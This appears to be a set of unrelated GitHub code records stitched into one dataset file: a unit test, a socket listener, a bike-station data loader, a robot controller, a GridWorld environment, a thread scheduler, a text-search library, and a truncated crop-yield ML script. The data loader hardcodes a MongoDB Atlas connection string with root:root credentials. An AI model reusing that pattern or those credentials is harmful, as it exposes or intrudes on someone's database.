test_get_model_name_for_final(db):\n db.emodel_metadata.iteration = \"\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = None\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__42\"\n db.emodel_metadata.iteration = \"hash\"\n assert db.get_model_name_for_final(seed=42) == \"cADpyr_L5TPC__hash__42\"\n\n\ndef test_get_ion_currents_concentrations(db):\n expected_ion_currents = {\n \"ica_Ca_HVA2\",\n \"ica_Ca_LVAst\",\n \"ik_K_Pst\",\n \"ik_K_Tst\",\n \"ina_NaTg\",\n \"ina_Nap_Et2\",\n \"ik_SK_E2\",\n \"ik_SKv3_1\",\n \"ihcn_Ih\",\n \"i_pas\",\n }\n expected_ionic_concentrations = {\n \"cai\",\n \"ki\",\n \"nai\",\n }\n ion_currents, ionic_concentrations = db.get_ion_currents_concentrations()\n assert set(ion_currents) == expected_ion_currents\n assert set(ionic_concentrations) == expected_ionic_concentrations\n","repo_name":"BlueBrain/BluePyEModel","sub_path":"tests/unit_tests/test_local_access_point.py","file_name":"test_local_access_point.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"43471419510","text":"#!/usr/bin/env python3\n\nimport datetime\nimport socket\n\n\nHOST = \"localhost\"\nPORT = 49281\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n print(\"bound\")\n s.listen()\n print(f\"listening on {HOST}:{PORT}\")\n while True:\n conn, addr = s.accept()\n with conn:\n print(\"Connected by\", addr)\n buf = b\"\"\n old_rx_time = None\n old_time = 0\n times = []\n while True:\n try:\n data = conn.recv(1024)\n except OSError:\n break\n if not data:\n break\n\n rx_time = datetime.datetime.now()\n if old_rx_time is not None:\n delta = rx_time - old_rx_time\n else:\n delta = None\n old_rx_time = rx_time\n buf += data\n (*frames, buf) = buf.split(b\"\\r\")\n for frame in frames:\n if (\n not frame\n and delta is not None\n and delta > datetime.timedelta(seconds=0.9)\n ):\n times.append(delta.total_seconds())\n print(sum(times) / len(times))\n # conn.send(b\"ACK \" + frame + b\"\\r\")\n print(\"[{} ({})]: {}\".format(rx_time.isoformat(), delta, frame))\n print(\"disconnected\")\n","repo_name":"dtwood/paging-gpio-firmware","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37054830706","text":"import requests\nimport json\nfrom pprint import pprint\nfrom pymongo import MongoClient\n\n\ndef get_vlille():\n url = \"https://opendata.lillemetropole.fr/api/records/1.0/search/?dataset=vlille-realtime&q=&rows=300&facet=libelle&facet=nom&facet=commune&facet=etat&facet=type&facet=etatconnexion\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vrennes():\n # url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=etat-des-stations-le-velo-star-en-temps-reel&q=&facet=nom&facet=etat&facet=nombreemplacementsactuels&facet=nombreemplacementsdisponibles&facet=nombrevelosdisponibles\"\n url = \"https://data.rennesmetropole.fr/api/records/1.0/search/?dataset=stations_vls&q=&rows=3000\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vlyon():\n # url = \"https://download.data.grandlyon.com/ws/rdata/jcd_jcdecaux.jcdvelov/all.json?maxfeatures=100&start=1\"\n url = \"https://public.opendatasoft.com/api/records/1.0/search/?dataset=station-velov-grand-lyon&q=&facet=name&facet=status&rows=500\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\ndef get_vparis():\n url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-disponibilite-en-temps-reel&q=&facet=name&facet=is_renting&rows=300\"\n # url = \"https://opendata.paris.fr/api/records/1.0/search/?dataset=velib-emplacement-des-stations&q=\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n response_json = json.loads(response.text.encode('utf8'))\n return response_json.get(\"records\", [])\n\n\nvlilles = get_vlille()\nvrennes = get_vrennes()\nvlyon = get_vlyon()\nvparis = get_vparis()\n\nvlliles_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nbvelosdispo') + elem.get('fields', {}).get('nbplacesdispo'),\n 'source': {\n 'dataset': 'Lille',\n 'id_ext': elem.get('fields', {}).get('libelle')\n },\n 'tpe': elem.get('fields', {}).get('type', '') == 'AVEC TPE',\n 'available': elem.get('fields', {}).get('etat', '') == 'EN SERVICE'\n }\n for elem in vlilles\n]\n\nvrennes_to_insert = [\n {\n 'name': elem.get('fields', {}).get('nom', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('nb_socles'),\n 'source': {\n 'dataset': 'Rennes',\n 'id_ext': elem.get('fields', {}).get('objectid')\n },\n 'tpe': elem.get('fields', {}).get('tpe', '') == 'oui',\n 'available': elem.get('fields', {}).get('etat', '') == 'Ouverte'\n }\n for elem in vrennes\n]\n\nvlyon_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('bike_stand'),\n 'source': {\n 'dataset': 'Lyon',\n 'id_ext': int(elem.get('fields', {}).get('gid'))\n },\n 'tpe': elem.get('fields', {}).get('banking', '') == 't',\n 'available': elem.get('fields', {}).get('status', '') == 'OPEN'\n }\n for elem in vlyon\n]\n\nvparis_to_insert = [\n {\n 'name': elem.get('fields', {}).get('name', ''),\n 'geometry': elem.get('geometry'),\n 'size': elem.get('fields', {}).get('capacity'),\n 'source': {\n 'dataset': 'Paris',\n 'id_ext': int(elem.get('fields', {}).get('stationcode'))\n },\n 'tpe': False,\n 'available': elem.get('fields', {}).get('is_renting', '') == 'OUI'\n }\n for elem in vparis\n]\n\npprint(vlliles_to_insert)\npprint(vrennes_to_insert)\npprint(vlyon_to_insert)\npprint(vparis_to_insert)\n\natlas = MongoClient('mongodb+srv://root:root@cluster0.8wh7w.mongodb.net/bicycle?retryWrites=true&w=majority')\n\ndb = atlas.bicycle\ndb.stations.create_index([(\"geometry\", \"2dsphere\")])\ndb.stations.insert_many(vlliles_to_insert)\ndb.stations.insert_many(vrennes_to_insert)\ndb.stations.insert_many(vlyon_to_insert)\ndb.stations.insert_many(vparis_to_insert)\n\n# for vlille in vlliles_to_insert:\n#\tdb.stations.insert_one(vlille)\n","repo_name":"JJFrenoi/ISEN-MONGO","sub_path":"programme_1.py","file_name":"programme_1.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23802300910","text":"#!/usr/bin/python2.7\r\n#\r\n# MAIN.PY IS AUTOMATICALLY STARTED ON REBOOT\r\n#\r\n\r\nimport cv2\r\nimport detect_object\r\nimport movement\r\nimport communication\r\nimport detect_aruco2\r\nimport numpy as np\r\nimport imutils\r\nimport time\r\n#from config import *\r\nimport config\r\nimport argparse\r\n\r\n#COLOR VALUES ARE MOVED TO CONFIG.PY, or more precisely into color_values.pkl,\r\n#which is written by hsv_range_detector.py\r\n\r\ncamera = cv2.VideoCapture(0)\r\n#camera.set(13, 0.40) #hue\r\n#camera.set(14, 0.04) #exposure\r\n\r\ncommunication.send_soon(\"init\")\r\n\r\n\r\nthrower_speed = 0\r\nlast_throw = time.time()\r\n\r\nblinds = cv2.imread('horseblinds.png', 0)\r\n\r\n\r\n'''Command line:\r\n Command line parameters are not saved anywhere, so use always when needed.\r\n Defaults are AA, off, blue.\r\n'''\r\nparser=argparse.ArgumentParser()\r\nparser.add_argument('--id', help='Field and robot: AA, AB, AC, BA...')\r\nparser.add_argument('--brakes', help='Emergency brake is on or not: on/off')\r\nparser.add_argument('--target', help='Where to throw: magenta or blue')\r\nparser.add_argument('--tambov', help='linear adjustment of throwing distance')\r\nargs=parser.parse_args()\r\n\r\nif not args.id is None:\r\n config.FIELD_ID = args.id[0]\r\n config.ROBOT_ID = args.id[1]\r\nif not args.brakes is None:\r\n config.BRAKES_ON = True if args.brakes=='on' else False\r\nif not args.target is None:\r\n config.TARGET_BASKET=args.target\r\n config.BASKET = config.MAGENTA_BASKET if args.target == 'magenta' else config.BLUE_BASKET\r\n\r\nif not args.tambov is None:\r\n detect_aruco2.TAMBOV = int(args.tambov)\r\nprint (detect_aruco2.TAMBOV)\r\n\r\n#print('PARAMS: FIELD=', FIELD_ID, ', ROBOT=', ROBOT_ID, ', BRAKES=', BRAKES_ON, ', TARGET=', TARGET_BASKET)\r\n#input()\r\n\r\nframestart = 0\r\ntry:\r\n while 1:\r\n\r\n (grabbed, frame) = camera.read()\r\n #print(\"grabbed = \",grabbed)\r\n frame = cv2.bitwise_and(frame, frame, mask = blinds)\r\n # resize the frame, blur it, and convert it to the HSV\r\n #frame = imutils.resize(frame, width=600)\r\n # blurred = cv2.GaussianBlur(frame, (11, 11), 0)\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n ball_x1, ball_y1, ball_radius1, ball_center1, ball_mask = detect_object.find_ball(hsv, config.BALL_LOWER, config.BALL_UPPER)\r\n if ball_x1 >= 0:\r\n cv2.circle(frame, ball_center1, 10, (0, 0, 255), -1)\r\n cv2.imshow(\"mask\", ball_mask)\r\n\r\n basket_dist, basket_x, basket_corners, basket_ids = detect_aruco2.detect_basket(frame)\r\n basket_dist = detect_aruco2.gimme_running_average(basket_dist)\r\n\r\n amount_of_carpet = detect_object.percentage_of_color(hsv, config.CARPET_LOWER, config.CARPET_UPPER)\r\n\r\n\r\n communication.update_comms()\r\n print(\"ball_y = \", ball_y1)\r\n m1,m2,m3,thrower_speed = movement.get_command(ball_x1, ball_y1,ball_radius1, basket_x, basket_dist, amount_of_carpet)\r\n print(\"sent by the main: \",m1,m2,m3)\r\n\r\n communication.set_motors(m1,m2,m3)\r\n now = time.time()\r\n communication.update_comms()\r\n if thrower_speed > 0:\r\n communication.set_thrower(thrower_speed)\r\n last_throw = now\r\n elif (now - last_throw) >= 3:\r\n communication.set_thrower(0)\r\n communication.update_comms()\r\n\r\n\r\n\r\n cv2.putText(frame, \"CARPET: {}\".format(int(amount_of_carpet)),\r\n (50, 80), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n fps = round(1.0 / (time.time() - framestart))\r\n cv2.putText(frame, \"FPS: {}\".format( fps ),\r\n (50, 100), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.5, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, \"dx: {}, dy: {}, radius: {}\".format(int(ball_x1), int(ball_y1), int(ball_radius1)),\r\n (50, 50), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.35, (0, 0, 255), 1)\r\n\r\n cv2.putText(frame, str( movement.activeState ),\r\n (10, 420), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.45, (0, 0, 255), 1)\r\n\r\n cv2.line(frame, (320,100), (320,200), (0,0,255),1)\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n framestart = time.time()\r\n\r\n\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n break\r\n elif key == ord('b'):\r\n config.BRAKES_ON = not config.BRAKES_ON\r\n if config.BRAKES_ON:\r\n communication.send_now('sm:0:0:0')\r\n print (\"BRAKES!\")\r\n elif key == ord('p'): # take a screenshot\r\n cv2.imwrite('screenshot.png', frame)\r\n\r\n elif key == ord('w') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:0:20')\r\n elif key == ord('s') and config.BRAKES_ON:\r\n communication.send_now('sm:20:0:-20')\r\n elif key == ord('a') and config.BRAKES_ON:\r\n communication.send_now('sm:-20:-20:-20')\r\n elif key == ord('d') and config.BRAKES_ON:\r\n communication.send_now('sm:20:20:20')\r\n\r\n elif key == 0xFF and config.BRAKES_ON:\r\n communication.send_soon('sm:0:0:0')\r\n\r\nexcept KeyboardInterrupt:\r\n communication.send_now(\"sm:0:0:0\")\r\n communication.send_now(\"st:0\")\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kadiraktass/robotex","sub_path":"software/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23374857220","text":"import numpy as np\n\nclass GridWorld:\n def __init__(self, grid_size=5, wind=0.2):\n # (0,0) bottom left corner (x,y)\n self.names = [\"Right\", \"Down\", \"Left\", \"Up\"]\n self.actions = [(1,0),(0,1),(-1,0),(0,-1)]\n self.n_actions = len(self.actions)\n self.n_states = grid_size**2\n self.wind = float(wind)\n \n self.grid_size = grid_size\n self.grid = np.zeros((grid_size, grid_size))\n\n self.features = np.eye(self.n_states)\n self.dynamics = self.transition_probabilities()\n self.real_rewards = np.array([self.reward(s) for s in range(self.n_states)])\n self.state = 0\n\n\n def reward(self, state_p):\n return 1 if state_p == self.n_states-1 else 0\n \n\n def reset(self, random=False):\n if random:\n self.state = np.random.randint(self.n_states)\n else:\n self.state = 0\n return self.state\n\n\n def step(self, a):\n probs = self.dynamics[:, a, self.state]\n self.state = np.random.choice(self.n_states, p=probs)\n return self.state\n\n\n def transition_probabilities(self):\n dynamics = np.zeros((self.n_states, self.n_actions, self.n_states))\n # S_t+1, A_t, S_t\n for s in range(self.n_states):\n x, y = s%self.grid_size, s//self.grid_size\n for a in range(self.n_actions):\n x_a, y_a = self.actions[a]\n for d in range(self.n_actions):\n x_d, y_d = self.actions[d]\n if 0 <= x+x_d < self.grid_size and 0 <= y+y_d < self.grid_size:\n dynamics[(x+x_d) + (y+y_d)*self.grid_size, a, s] += self.wind/self.n_actions\n else:\n dynamics[s, a, s] += self.wind/self.n_actions\n if 0 <= x+x_a < self.grid_size and 0 <= y+y_a < self.grid_size:\n dynamics[(x+x_a) + (y+y_a)*self.grid_size, a, s] += 1 - self.wind\n else:\n dynamics[s, a, s] += 1 - self.wind\n \n return dynamics\n\n \n def test(self):\n for s in range(self.n_states):\n print(\"/// State: \", s)\n for a in range(self.n_actions):\n print(\"/// Action: \", self.names[a])\n probs = self.dynamics[:, a, s]\n print(probs.reshape(-1, self.grid_size))\n\n\n def optimal_policy(self, state):\n x, y = state%self.grid_size, state//self.grid_size\n if x > y:\n return 1\n elif x < y:\n return 0\n else:\n return np.random.randint(2)\n\n\n def generate_trajectories(self, num, length, policy=None):\n if not policy:\n policy = self.optimal_policy\n\n trajs = []\n for n in range(num):\n t = []\n state = self.reset()\n for i in range(length):\n action = policy(state)\n state_p = self.step(action)\n t.append([state, action])\n state = state_p\n trajs.append(t)\n return np.array(trajs)","repo_name":"TroddenSpade/Maximum-Entropy-Deep-IRL","sub_path":"envs/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"16"}
+{"seq_id":"20083184923","text":"# \n# cronned processes\n#\nimport time\nimport multiprocessing\nfrom threading import Thread, Event\nimport logging\nfrom file import DirectoryScanner, DiskScanner\n\ndef initCron(appContext):\n\tappContext.threads = []\n\n\tdirectoryScanner = DirectoryScanner(appContext )\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=directoryScanner.process ) )\n\n\tdiskScanner = DiskScanner(appContext)\n\tappContext.threads.append( RepeatingTimer( delay=30.0, target=diskScanner.process ) )\n\ndef startCron(appContext):\n\tfor thr in appContext.threads:\n\t\tthr.start()\n\nclass RepeatingTimer(Thread):\n\tdef __init__(self, delay=15, maxIterations=0, target=None):\n\t\tThread.__init__(self)\n\t\tself.daemon = True\n\t\tself.delay = delay\n\t\tself.target = target\n\t\tself.maxIterations = maxIterations\n\t\tself.finished = Event()\n\n\tdef run(self):\n\t\tcurrentIteration = 0\n\t\twhile not self.finished.isSet() and (self.maxIterations <= 0 or currentIteration < self.maxIterations):\n\t\t\tself.finished.wait( self.delay)\n\t\t\tif not self.finished.isSet():\n\t\t\t\tself.target()\n\t\t\t\tcurrentIteration += 1\n\n\tdef cancel(self):\n\t\tself.finished.set()\n","repo_name":"ickyfehmleh/hoarder","sub_path":"app/cron/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71018146249","text":"import pickle\nimport re\nfrom pathlib import Path\nfrom typing import Dict, List\n\nimport faiss\nimport numpy as np\nimport spacy\nimport wikipedia\nfrom loguru import logger\nfrom pydantic import BaseModel\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\nfrom discworld_hex.book import Book, BookText\nfrom discworld_hex.sections import SECTIONS\n\nmodel = SentenceTransformer()\n\n\nclass Library(BaseModel):\n name: str\n books: List[Book] = []\n\n sentence_splitter_model: spacy.Language = None\n encoder_model: SentenceTransformer = None\n\n sentence_index: faiss.IndexFlatL2 = None\n sentence_index_to_book_text: Dict[int, BookText] = {}\n\n _plot_regex = re.compile(r\"(?:== (?:Plot|Synopsis)[^\\n]+$)\\s*(.+?)\\s*^== \", re.MULTILINE | re.S)\n\n class Config:\n arbitrary_types_allowed = True\n\n @classmethod\n def from_book_page_names(\n cls, name: str, book_page_names: List[str], sentence_splitter_model=None, encoder_model=None, limit: int = 0\n ):\n\n if limit > 0:\n book_page_names = book_page_names[:limit]\n\n logger.info(f\"Library {name} initialising from books with page names: {', '.join(book_page_names)}\")\n\n books = []\n for b in tqdm(book_page_names):\n book = Book.from_page(wikipedia.page(b, auto_suggest=False, redirect=False, preload=False))\n\n book.parse_plot()\n if not book.plot:\n logger.warning(f\"{book.name} has no plot, not adding it.\")\n continue\n\n book.parse_plot_paragraphs()\n book.parse_sentences(sentence_splitter_model)\n book.encode_sentences(encoder_model)\n books.append(book)\n\n if len(books) <= 0:\n raise ValueError(\"No books were added\")\n\n logger.success(\n f\"{len(books)} books loaded, parsed and encoded successfully: {', '.join(b.name for b in books)}\"\n )\n\n return Library(\n name=name,\n books=books,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n )\n\n def build_index(self):\n\n tensors = np.stack([book_sentences for book in self.books for book_sentences in book.plot_sentences_encoded])\n\n logger.info(f\"Building index from {tensors.shape[0]} sentences.\")\n\n tensor_id = 0\n for book in self.books:\n for sentence in book.plot_sentences:\n self.sentence_index_to_book_text[tensor_id] = BookText(book, sentence)\n tensor_id += 1\n\n index = faiss.IndexFlatL2(tensors.shape[1])\n index.add(tensors)\n\n assert index.is_trained\n\n logger.success(\n f\"Sentence index built, contains {tensors.shape[0]} sentences with {tensors.shape[1]} elements each.\"\n )\n self.sentence_index = index\n\n def save(self, path: Path = None):\n path = path or Path.home()\n path = path / f\"{self.name}.pkl\"\n\n logger.info(f\"Saving library to {path}\")\n with open(path, \"wb\") as f:\n pickle.dump(self, f, pickle.HIGHEST_PROTOCOL)\n logger.success(f\"Saved library to {path}\")\n\n @classmethod\n def load(cls, path: Path):\n logger.info(f\"Loading library from {path}\")\n\n with open(path, \"rb\") as f:\n library = pickle.load(f)\n\n logger.success(f\"Library {library.name} loaded!\")\n return library\n\n def search_interactive(self, k):\n logger.info(\n f\"Searching the {self.name} library interactively.\\n\"\n f\"Available books: {len(self.books)} – {', '.join(b.name for b in self.books)}\\n\"\n f\"Looking at {k} nearest neighbours.\"\n )\n\n while True:\n sentence = input(\"Input a sentence: \")\n\n sentence_encoded = self.encoder_model.encode(sentence)\n distances, indices = self.sentence_index.search(np.stack([sentence_encoded]), k)\n\n logger.debug(f\"distances: {distances}, indices: {indices}\")\n\n # we assume only one sentence query here:\n distances = distances[0]\n indices = indices[0]\n\n for rank in range(k):\n i = indices[rank]\n book, text = self.sentence_index_to_book_text[i]\n print(f\"{(rank + 1):>3}. {text}\")\n print(f\" – {book.name}, distance: {distances[rank]:.2f}\\n\")\n\n\ndef build_library(\n name: str = \"Discworld\",\n book_page_names: List[str] = SECTIONS[\"Discworld\"],\n sentence_splitter_model_name: str = \"en_core_web_sm\",\n encoder_model_name: str = \"all-mpnet-base-v2\",\n limit: int = 0,\n path: Path = None,\n):\n logger.info(f\"Loading sentence splitter model {sentence_splitter_model_name}\")\n sentence_splitter_model = spacy.load(sentence_splitter_model_name)\n\n logger.info(f\"Loading encoder model {encoder_model_name}\")\n encoder_model = SentenceTransformer(encoder_model_name)\n\n library = Library.from_book_page_names(\n name=name,\n book_page_names=book_page_names,\n sentence_splitter_model=sentence_splitter_model,\n encoder_model=encoder_model,\n limit=limit,\n )\n library.build_index()\n library.save(path=path)\n\n\ndef search_library(path: Path = Path.home() / \"Discworld.pkl\", k: int = 4):\n library = Library.load(path=path)\n\n library.search_interactive(k)\n\n\nif __name__ == \"__main__\":\n build_library()\n\n search_library()\n","repo_name":"MikulasZelinka/discworld-hex","sub_path":"src/discworld_hex/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"1941098720","text":"\"\"\"\n@author: Mohsen\nML+APSIM for Corn Yield Prediction\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport random\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, MinMaxScaler\nfrom sklearn import linear_model\nfrom sklearn.linear_model import Lasso, ElasticNet, Ridge, LassoCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom xgboost.sklearn import XGBRegressor\nfrom lightgbm import LGBMRegressor\nfrom scipy.optimize import minimize\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, cross_validate, KFold\nfrom sklearn import metrics\nfrom sklearn.model_selection import RandomizedSearchCV, TimeSeriesSplit\nimport time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.datasets import load_boston\nfrom sklearn.feature_selection import RFE\nimport warnings\nfrom scipy.io import loadmat\nfrom sklearn.model_selection import LeavePGroupsOut, GridSearchCV, GroupKFold\nfrom hyperopt import STATUS_OK\nfrom hyperopt import hp\nfrom hyperopt import tpe\nfrom hyperopt import Trials\nfrom hyperopt import fmin\nimport os\nfrom pathlib import Path\n\n\nwarnings.filterwarnings('ignore')\n\npd.set_option('display.max_columns', 500)\nnp.random.seed(1369)\npopulation = loadmat('INFO_POPULATION.mat')['INFO_POPULATION']\nprogress = loadmat('INFO_PROGRESS.mat')['INFO_PROGRESS']\nsoil = loadmat('INFO_SOIL.mat')['INFO_SOIL']\nYield = pd.DataFrame(loadmat('INFO_Yield.mat')['INFO_Yield'], columns =['year', 'state', 'county', 'yield'])\n\nweather = pd.read_parquet('main_weather_final.parquet')\nweather = weather[(weather.year >= 1984)&(weather.year <= 2018)]\nweather.state = weather.state.astype('int')\nweather.county = weather.county.astype('int')\nweather.year = weather.year.astype('int')\n\n# Constructing quarterly and cumulative weather features\nweather['prcp_Q2'] = weather.loc[:,'prcp_14':'prcp_26'].sum(axis=1)\nweather['prcp_Q3'] = weather.loc[:,'prcp_27':'prcp_39'].sum(axis=1)\nweather['prcp_Q4'] = weather.loc[:,'prcp_40':'prcp_52'].sum(axis=1)\nweather['prcp_Q1:Q2'] = weather.loc[:,'prcp_1':'prcp_26'].sum(axis=1)\nweather['prcp_Q1:Q3'] = weather.loc[:,'prcp_1':'prcp_39'].sum(axis=1)\nweather['prcp_Q1:Q4'] = weather.loc[:,'prcp_1':'prcp_52'].sum(axis=1)\n\nweather['tmax_Q2'] = weather.loc[:,'tmax_14':'tmax_26'].mean(axis=1)\nweather['tmax_Q3'] = weather.loc[:,'tmax_27':'tmax_39'].mean(axis=1)\nweather['tmax_Q4'] = weather.loc[:,'tmax_40':'tmax_52'].mean(axis=1)\nweather['tmax_Q1:Q2'] = weather.loc[:,'tmax_1':'tmax_26'].mean(axis=1)\nweather['tmax_Q1:Q3'] = weather.loc[:,'tmax_1':'tmax_39'].mean(axis=1)\nweather['tmax_Q1:Q4'] = weather.loc[:,'tmax_1':'tmax_52'].mean(axis=1)\n\nweather['tmin_Q2'] = weather.loc[:,'tmin_14':'tmin_26'].mean(axis=1)\nweather['tmin_Q3'] = weather.loc[:,'tmin_27':'tmin_39'].mean(axis=1)\nweather['tmin_Q4'] = weather.loc[:,'tmin_40':'tmin_52'].mean(axis=1)\nweather['tmin_Q1:Q2'] = weather.loc[:,'tmin_1':'tmin_26'].mean(axis=1)\nweather['tmin_Q1:Q3'] = weather.loc[:,'tmin_1':'tmin_39'].mean(axis=1)\nweather['tmin_Q1:Q4'] = weather.loc[:,'tmin_1':'tmin_52'].mean(axis=1)\n\nweather['gddf_Q2'] = weather.loc[:,'gddf_14':'gddf_26'].sum(axis=1)\nweather['gddf_Q3'] = weather.loc[:,'gddf_27':'gddf_39'].sum(axis=1)\nweather['gddf_Q4'] = weather.loc[:,'gddf_40':'gddf_52'].sum(axis=1)\nweather['gddf_Q1:Q2'] = weather.loc[:,'gddf_1':'gddf_26'].sum(axis=1)\nweather['gddf_Q1:Q3'] = weather.loc[:,'gddf_1':'gddf_39'].sum(axis=1)\nweather['gddf_Q1:Q4'] = weather.loc[:,'gddf_1':'gddf_52'].sum(axis=1)\n\nweather['srad_Q2'] = weather.loc[:,'srad_14':'srad_26'].sum(axis=1)\nweather['srad_Q3'] = weather.loc[:,'srad_27':'srad_39'].sum(axis=1)\nweather['srad_Q4'] = weather.loc[:,'srad_40':'srad_52'].sum(axis=1)\nweather['srad_Q1:Q2'] = weather.loc[:,'srad_1':'srad_26'].sum(axis=1)\nweather['srad_Q1:Q3'] = weather.loc[:,'srad_1':'srad_39'].sum(axis=1)\nweather['srad_Q1:Q4'] = weather.loc[:,'srad_1':'srad_52'].sum(axis=1)\n\n\n# Removing weather data after harvesting and before next planting date\nidx = list(['state', 'county', 'year']) + \\\n list(weather.loc[:,'prcp_16':'prcp_43'].columns) + \\\n list(weather.loc[:,'tmax_16':'tmax_43'].columns) + \\\n list(weather.loc[:,'tmin_16':'tmin_43'].columns) + \\\n list(weather.loc[:,'gddf_16':'gddf_43'].columns) + \\\n list(weather.loc[:,'srad_16':'srad_43'].columns) + \\\n list(weather.loc[:, 'prcp_Q2':])\nweather = weather[idx]\n\n\ncv = 10\n\n# Importing APSIM variables\ndata_d = pd.read_csv('data_all_apsim.csv', index_col=0)\n\n\n\n## ----------------- data preprocessing ----------------- ##\n\n\n# Feature construction (trend)\ndata_d['yield_trend'] = 0\nfor s in data_d.State.unique():\n for c in data_d[data_d.State==s].County.unique():\n y1 = pd.DataFrame(data_d.Yield[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n x1 = pd.DataFrame(data_d.Year[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n regressor = LinearRegression()\n regressor.fit(x1, y1)\n data_d.loc[(data_d.Year<2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(x1)\n if len(data_d.Year[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c)].unique()) != 0:\n data_d.loc[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(pd.DataFrame([2018]))\n\n# Joining the APSIM, soil and progress variables together\ndata = pd.concat([data_d,pd.DataFrame(progress[:,12:25])], axis=1)\ndata = pd.concat([data,pd.DataFrame(soil)],axis=1)\n\n# dropping rows with na values (years before 1984)\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\n# renaming columns\nprogress_names = ['Progress_' + str(i) for i in range(1,14)]\nsoil_names = ['Soil_' + str(i) for i in range(1,181)]\nnames = [progress_names, soil_names]\nnames = [item for sublist in names for item in sublist]\ncol_names = data.columns.values\ncol_names[1:4] = ['year', 'state', 'county']\ncol_names[28:] = names\ndata.columns = col_names\n\n# Joining weather variables\ndata = pd.merge(data, weather , on=['year','state','county'])\n\n# Scaling the variables\ndata = data.rename(columns = {'year':'Year'})\ncolumns_to_scale = data.drop(columns=['Yield','Year','state','county']).columns.values\nscaler = MinMaxScaler()\nscaled_columns = scaler.fit_transform(data[columns_to_scale])\nscaled_columns = pd.DataFrame(scaled_columns, columns=columns_to_scale)\n\ndata2 = pd.DataFrame(data.Yield)\ndata = pd.concat([data2, data.Year, scaled_columns], axis=1)\n\n# Splitting the data set to test and train\ntest = data[data.Year==2018]\ntrain = data[data.Year!=2018]\n\nx_test = test.drop(columns=['Yield'])\ny_test = test.Yield\n\nX = train.drop(columns=['Yield'])\nX = X.reset_index(drop=True)\nY = train.Yield\nY.reset_index(inplace=True, drop=True)\n\n\n# feature selection with random forest\nrf = RandomForestRegressor(n_estimators=100)\nrf.fit(X, Y)\n\nfrom eli5.sklearn import PermutationImportance\n\nperm = PermutationImportance(rf, cv=cv, n_iter=10).fit(X, Y)\nfeature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\nfeature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\nselected_features = feature_importances.iloc[0:80,:][0]\nif np.isin('Year', selected_features)==False:\n 